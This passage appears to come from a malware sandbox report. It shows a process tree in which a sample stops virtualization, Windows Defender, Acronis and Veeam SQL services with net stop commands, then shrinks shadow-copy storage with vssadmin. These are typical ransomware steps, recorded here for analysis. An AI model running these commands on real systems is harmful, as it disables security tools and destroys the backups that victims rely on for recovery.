  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicguestinterface"
      4⤵
      PID:252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
  2⤵
  PID:1196
- - C:\Windows\system32\net.exe
    net stop "vmicshutdown"
    3⤵
    PID:4880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicshutdown"
      4⤵
      PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
  2⤵
  PID:4696
- - C:\Windows\system32\net.exe
    net stop "vmicheartbeat"
    3⤵
    PID:3952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicheartbeat"
      4⤵
      PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmcompute"
  2⤵
  PID:1608
- - C:\Windows\system32\net.exe
    net stop "vmcompute"
    3⤵
    PID:3484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmcompute"
      4⤵
      PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
  2⤵
  PID:4544
- - C:\Windows\system32\net.exe
    net stop "vmicvmsession"
    3⤵
    PID:4580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvmsession"
      4⤵
      PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
  2⤵
  PID:3276
- - C:\Windows\system32\net.exe
    net stop "vmicrdv"
    3⤵
    PID:4988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicrdv"
      4⤵
      PID:2280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
  2⤵
  PID:2932
- - C:\Windows\system32\net.exe
    net stop "vmictimesync"
    3⤵
    PID:4588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmictimesync"
      4⤵
      PID:3068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvss"
  2⤵
  PID:712
- - C:\Windows\system32\net.exe
    net stop "vmicvss"
    3⤵
    PID:820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvss"
      4⤵
      PID:3116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
  2⤵
  PID:3152
- - C:\Windows\system32\net.exe
    net stop "VMAuthdService"
    3⤵
    PID:2924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMAuthdService"
      4⤵
      PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
  2⤵
  PID:2316
- - C:\Windows\system32\net.exe
    net stop "VMnetDHCP"
    3⤵
    PID:3736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMnetDHCP"
      4⤵
      PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
  2⤵
  PID:4056
- - C:\Windows\system32\net.exe
    net stop "VMware NAT Service"
    3⤵
    PID:1376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMware NAT Service"
      4⤵
      PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
  2⤵
  PID:3052
- - C:\Windows\system32\net.exe
    net stop "VMUSBArbService"
    3⤵
    PID:436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMUSBArbService"
      4⤵
      PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
  2⤵
  PID:3456
- - C:\Windows\system32\net.exe
    net stop "VMwareHostd"
    3⤵
    PID:1324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMwareHostd"
      4⤵
      PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sense"
  2⤵
  PID:864
- - C:\Windows\system32\net.exe
    net stop "Sense"
    3⤵
    PID:4876
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sense"
      4⤵
      PID:3468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
  2⤵
  PID:4344
- - C:\Windows\system32\net.exe
    net stop "WdNisSvc"
    3⤵
    PID:5072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WdNisSvc"
      4⤵
      PID:3048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WinDefend"
  2⤵
  PID:752
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:4912
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:4884

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:500

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:604

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AcrSch2Svc"
1⤵
PID:4092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC"
1⤵
PID:2032

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2008R2"
1⤵
PID:4860
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:4764